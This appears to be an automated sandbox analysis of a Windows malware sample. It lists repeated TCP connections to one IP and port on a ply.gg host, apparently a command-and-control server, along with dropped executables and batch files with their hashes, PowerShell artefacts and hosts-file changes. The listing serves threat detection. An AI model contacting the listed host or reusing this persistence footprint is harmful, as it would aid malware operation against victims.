| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
Files
memory/4984-0-0x00007FFBB29D3000-0x00007FFBB29D5000-memory.dmp
memory/4984-1-0x00000000005A0000-0x00000000005BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
| MD5 | 12a225de8199d2a31f049a6f300d8cfa |
| SHA1 | 24819a452cf1db15167a52b12f258d27baacbd6e |
| SHA256 | 1399d955881d9db34cbe261c117818a7933a1cc7c8cdabcff8fc22c880053801 |
| SHA512 | 3e321ac6e35b83e0645611721354a03358da7dde8bc42f761e258f87fa2ae8a33c3778aa48b10e0ead87331eded7240b7134f9c05333a823a53258f7a52cac32 |
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
| MD5 | 7091469b8f2213255ba3c2870a60c7eb |
| SHA1 | 17e501e4900bf5dacc5cb0424db87d2ce7a89880 |
| SHA256 | d63b09f1a44ed10ff2e6aa558ab494ad561066fff13de330eae87e6749a0e3d7 |
| SHA512 | f67a4244cf2f4c6fdc728441d85e4e3d6cea3fd28fcc2b21aefc385257d3ad4eb177ff58acb07621b6fb6d4c331b7df80f5a9bd7a53c5d54bb91f000138223b8 |
memory/3756-28-0x0000000000C00000-0x0000000000C0E000-memory.dmp
memory/964-31-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp
memory/964-30-0x0000000000230000-0x000000000024A000-memory.dmp
memory/4984-19-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp
memory/4984-32-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp
memory/3756-33-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Launch.bat
| MD5 | 41bded52aa489cdea31a174f89bca818 |
| SHA1 | da072fb11e72d2762f96d0f901d7ef7bca17218d |
| SHA256 | 2172bb0729d91bcf777bbdd0c42dae9c71de0f1251d165655f551673bf622d59 |
| SHA512 | d0fa53492e783e627186d96dcf3ffcecc10f8895bd42a16f4946c34de6e4ec2bc156bab0e070ec0ebf9492f394d11d4c7929df1b57ca59cb6e11a566de3a6dd9 |
C:\Users\Admin\AppData\Local\Temp\hig.bat
| MD5 | 48e8089eae5c8c602b20696cf2840f50 |
| SHA1 | b02784c1b5e3fa8a3f2a1ff615870719aeda2b16 |
| SHA256 | ab3e6e5835550f067ce594533afba7c8c3320891298ebb6fb76f7bdc8b049174 |
| SHA512 | 38f90b076c34ff3e25750a69c8b506897d8b0ed2d4a113cbabd496c06b337a206b1a21fde667bef207276bf36e986ab58d384e5467c2ac38280394fa3d27cd10 |
memory/2576-45-0x000002564A830000-0x000002564A852000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h3nc0pkz.gmu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e6baeec02c3d93dce26652e7acebc90 |
| SHA1 | 937a7b4a0d42ea56e21a1a00447d899a2aca3c28 |
| SHA256 | 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0 |
| SHA512 | 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4 |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | a6d2012e8fd4589537bf1e9c4bc10b95 |
| SHA1 | 364b32ec273d84ee4b9f0bb34d82d24fb16084e9 |
| SHA256 | 5d5ba59c05d8bb34983beab9bc1fad779beb735c3da524e26731e30e795c82c4 |
| SHA512 | 36b54d98d11243fed8c2e0474d81904b6cb51d48440bb5f3d8fa16e3e1cb09ac0738b03bcfba6385ba65f36041e69049d2bd2245e901d94ada44295cda2488e7 |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | 11aea30373318262d742b249e95bf18d |
| SHA1 | 550fb029c21c9a7901e72c04df9ce6076a126f43 |
| SHA256 | 52c8c2cb926d340e603aaf55ebf46f354455b547d6ef7590523102506e79f6ad |
| SHA512 | e8f45e7575a6d6e1428124af8098ab6cdcdf915ad9f77ea671e25dc5ef4432cd7d443f8ddc46ec19564d776880aa94ae24d1221ac0299ef131e49f8e7c215bf0 |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | ae0ff45aec4946c6badcb1dc05073646 |
| SHA1 | 905ab98cab2d2706075bebaabc8355239b4265c3 |
| SHA256 | e55e532e2004fd9a74956054c25a24e7afa44baa419a04631b79e35a101661db |
| SHA512 | 0e3dc5fbd5187142759ed2d0f03e14e74ac8b839aabf55a2f4e630b38d1b899bae0854f33333032ca5edfd3426b0c945981889bb0fcbc16bd56059fc6f6507f1 |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | 6bce782d271aad364419772c8950d64b |
| SHA1 | b24ec3192c804fa3f59749736471c6834810a174 |
| SHA256 | ceef86e706b9404d3561c2dfbd13b77e6be3df07a52aae5bde01453fb08deb0a |
| SHA512 | 2f91176f2c69d50a1e9a438a58b2626d74a165b02d8f4c06e1b189cd550001e5a0e1f07b00d2a8daca15239eaae2d6ab3d6131d5f45a19e5fa2f81ea9653e896 |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | 4c4e7fb6daf4d99c62fc58947d47ceb9 |
| SHA1 | 20598cb0ae9e78519aa62a1064eee64b70b8ee95 |
| SHA256 | 8ccdb5753b997c4afab74ac19ff1840eddb8e97ee5ca47a5d033bb6c91c6b678 |
| SHA512 | f44a0199cabd45c4fcd3b8945cf589f5c63a020b3d3bc4fe90f1ff1ceb57d4017066a04571bcf31f330fd2cf7238605c72104c1ba83e02af6eac74d9665d7bf6 |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | eeb086a7854dae6cdce64f49eb87d64c |
| SHA1 | 82a3a261651432b1b3e29d7d8def566b1b18cf2a |
| SHA256 | 5822c2222c4a4121a1667c7d483ff8b91e489a4c5e881c75a4354712bfe6f435 |
| SHA512 | 3d38272520b97022539d93e206a58c3398ccf30758eef2d31a976a8cb84686f37cc2729efa9d49ad85bd3590ab5baec071772b8eaa2c82db3443a189329cc431 |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | c22ead9cd4f450b9013dd97edcbd92d9 |
| SHA1 | 0c471e4ebb155285dcd55c54811dd481b40fe73e |
| SHA256 | 8adacfc3a47b97dd7bd96e32e408dea9d65528f6fe468957c8fd13888989ef3c |
| SHA512 | 6251893fc79e4a39ef5625c0c24c799806c6db0a9462f721d55b318e815820e6c3fa954824fb7b84a60e77c2dd9ac3cf2d41151e2503c4331daaae59c8b15a70 |
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_43357451CDD242CC822BCFB6AFBA708A.dat
| MD5 | 4d7d9a9face11a139fe2b6a8f1996fca |
| SHA1 | 8a8007baa1fefee5a8505a9625e3084c9df5527e |
| SHA256 | 4a6c5dc170f8ec004497eb67143ea7c93368fb634cd7eb050dd5ddecb5c58181 |
| SHA512 | 6fc76cc0665498a64a98abb4a86bb24ea34c94f1c23e4b7d32dfb0e2ae2f43f36162ce3a0226e54b10db1381cee031b09ec779a287038da75975fde308fa6cbb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 31679f5ef00b31939533d77c27f65954 |
| SHA1 | e193adcafa3e9bd049719818aee6f1c597620919 |
| SHA256 | 797cbbc8b04ddf84d0607192a026a2dae46bf6755f6d87c990216482a5f55194 |
| SHA512 | 3a7146378a2e825f742b071b78c58f6de5502cd644bf7a6281f8feffc822f6994822703c9759696ab1807fd473b6f99f471b589526b5558b2ee4ffd8fbd0cb98 |
C:\Windows\Logs\ReAgent\ReAgent.log
| MD5 | ac8e332adf2614a9ebf9bcdc16c08677 |
| SHA1 | 040f1fb63f84187af3579fc53dadcc674bde1ca7 |
| SHA256 | 14c519116708145b1d9d0c5869b412717b56d9e809e1c7cbc3efcd1a2f069144 |
| SHA512 | 823ec12dc8db66b39339ba146d2bb53e5c58085814322d716d183d99dbf569a851d0e2c46558ffcff79b39c7eb4b092cf9b09417fad18a9c10488f4ea38dece4 |
C:\Windows\Panther\UnattendGC\diagerr.xml
| MD5 | 4f157b5055b21ae34028756156c332f4 |
| SHA1 | d9c1427ea79fcfb6187b32f206ff796c539e6f67 |
| SHA256 | 35d66d80352ea77ddab275e0656bb5870bed7b7d60db2e6dc6d7626f63eceb7d |
| SHA512 | 5afd347c51f1176b9d2b7e98d2748e14a1c52751c1734e5b2c753a45c9b1e0f032aa0f4277cdb02712e29cf47b4d01a95d3677e854d936391f82ea13c362d71b |
C:\Windows\Panther\UnattendGC\diagwrn.xml
| MD5 | b8d3e458ea6c616dbbe42bc7cb919e1d |
| SHA1 | 2fa8f355022ff076716690f5afae21430a171063 |
| SHA256 | 498105e4ddcdc0d42e0a16016c97b2aec22176b9eede80676f094482f8dc7e74 |
| SHA512 | 0d3266d82fb5060a81018a2a55fbd9873a831eae91ec4d441a6982a3f36b359b9e8e5226097032a7d09148a0b5267056f6c37e22e8c0a7d917c130507deaab19 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b6c336e3b3cb2cd04d42baac1aa4aa0d |
| SHA1 | 35a943816f3e9cd596e91be92c4bdb1b05a42d88 |
| SHA256 | 4518fb6ffb3f70be78cb243cac94fcf74d9c58d2e7bd8c510ebe696d3f81cb60 |
| SHA512 | 42c4a8f07051ac7c00014ddaa0b0db50bdbcb49a30ae96803e37f3a566c100932367e0a50baead881509ae4a4d49c769513626c5015fe0a02d1d3ae22ca759f4 |
C:\Windows\System32\Recovery\ReAgent.xml
| MD5 | 910f3916ede823b6b4b5e302e6ececbe |
| SHA1 | d41dda3f32687605193ad0f421c6b3e2bc48ec97 |
| SHA256 | 5cd6fa01b3949b7fca0fdbdab434d93badcfcdf09de8e2881268abf7ed7064fa |
| SHA512 | 893f4a7f2cb3b6aa2ebd0e82f1ab55658b4e7791872bfb97dd269c35df0199c9b590e0902a83cfc8ae85f883f8adb6f514593d4dde68d2c0a5406ecc7851f582 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d0a4a3b9a52b8fe3b019f6cd0ef3dad6 |
| SHA1 | fed70ce7834c3b97edbd078eccda1e5effa527cd |
| SHA256 | 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31 |
| SHA512 | 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b |
memory/4376-197-0x000001F76A140000-0x000001F76A8E6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3ff03fa0f91101b7c4477cbef8cfa128 |
| SHA1 | 44eeb7f4037615d210d611259ff31113a16cd08e |
| SHA256 | 9db3784f6c5993d0dc8e12e193743f3bcd381dbdcb3c676a3d4c1fb3e49dd676 |
| SHA512 | f4bdc1698e14d255e25576c566136d9b575bafb367f11453bf3cb37536ff318ff4fc8abce6214e9665b1ab133331f854b40cf8d050e9206ec03fbe2efe853be7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 050567a067ffea4eb40fe2eefebdc1ee |
| SHA1 | 6e1fb2c7a7976e0724c532449e97722787a00fec |
| SHA256 | 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e |
| SHA512 | 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 538b0e698f593f5b117b53936db7f9b4 |
| SHA1 | 17213ae74094a2c43629492171ccc533d63eb2bd |
| SHA256 | 8d61e539308dc6f65f73f88d8dc05336cc122940fff58789978c8b853d0ef52d |
| SHA512 | e184ac2422551fbc3d37a8e58aa5e148e2657d0c2152f05e4759da469fd88a3fd736e3670a30f6ccd5217361304c1d707f1d19c255613b06b6b8045638ed386f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8546c137c9ecfd8edf681124206e5bd9 |
| SHA1 | 6f4bd92d0c91ce058e3ec511b237679e1af96b3a |
| SHA256 | 7534c1af638d58291855245d4a9217a2f7d36acd289ad5d12af130a961379ad1 |
| SHA512 | 29e938bd2e2d1b4e3204be4b4d6e9d35f1a50e55b8324b04b4746f3ddf5fe9eef6aa8ef42fb89e6fb805c9f5a1afa8f139bbcfc43960f101e02a00db475c1c26 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 781da0576417bf414dc558e5a315e2be |
| SHA1 | 215451c1e370be595f1c389f587efeaa93108b4c |
| SHA256 | 41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe |
| SHA512 | 24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 051a74485331f9d9f5014e58ec71566c |
| SHA1 | 4ed0256a84f2e95609a0b4d5c249bca624db8fe4 |
| SHA256 | 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888 |
| SHA512 | 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 947f5aa506644a452dd41f1c18ea6103 |
| SHA1 | d26a04fd395c97e0028a46aaabf2a4e6767dce75 |
| SHA256 | 69428140330e639719076b30ff37512ccb9202ba7013c0ad7b938ac95c4aeabd |
| SHA512 | 6b61b9d7936cd3e7eef324c79f021af7400c850ed3312c5c444d0a08c6476d7b7bc3730edf96fe749c0f18464c0cf3624a1f80abaf69cb564b231fdc6527d698 |
memory/964-321-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 60bc516c7887b9d6fe42e84a0b89dbba |
| SHA1 | 2fe5182a8f635118064a7db99c347dff4dfe9347 |
| SHA256 | 33bcde3020bd4db5499d54dcd1cd3f7a06d5c4979b93edf1376455a5acc0cd35 |
| SHA512 | 209295afc27536166f89b36c158f066f2b781d5505a978eac97ba80ec2f68c42836a4081fab91bd6eb581b397360c308167bff8f089a8e8401888711e8df6dc4 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 5cc26781ac96f81fdc8b44b772cdd068 |
| SHA1 | ee2b721cd8d4147e653d0eebf541fe4eca208d8e |
| SHA256 | 1cea06489f298305dfbb27d330e893412c0bccd439ad5ba968f2cd532b7cf37a |
| SHA512 | 87c8e3720fd61376a333ab9dd9030254b9f281a26d37c9ea333dff11c81445c40392b08090b07808666861df6686c6f670908e668bb14ded8319d18f77b9f346 |
memory/3756-331-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | ef2ab6c8eaea7eae82e82a97378f52d6 |
| SHA1 | 488ad508be482628cf9ce540fd8a77e6d5990af7 |
| SHA256 | cf439d5ccacc5230a63f52becae0e08917634fd12bc90c6b0846596069a30d6e |
| SHA512 | bbb8588788f0d703266a52e79ebd8bd1de5bd0281b5d07ad68f3b1839a650b6d2238927408f965a143c8e4728706287e72416feda7865e6fc4377e5130f0ae2f |
C:\Windows\System32\drivers\etc\hosts
| MD5 | cbeb5c40d3cdd27f5b118cc6ab1e442b |
| SHA1 | 4108bdebf75dd0973c53dcb5a2befa726e99fa3c |
| SHA256 | 3fbdfbe545350d81a17bee857b3ca7f7bb23d72d1726be82e8dfb813ce077095 |
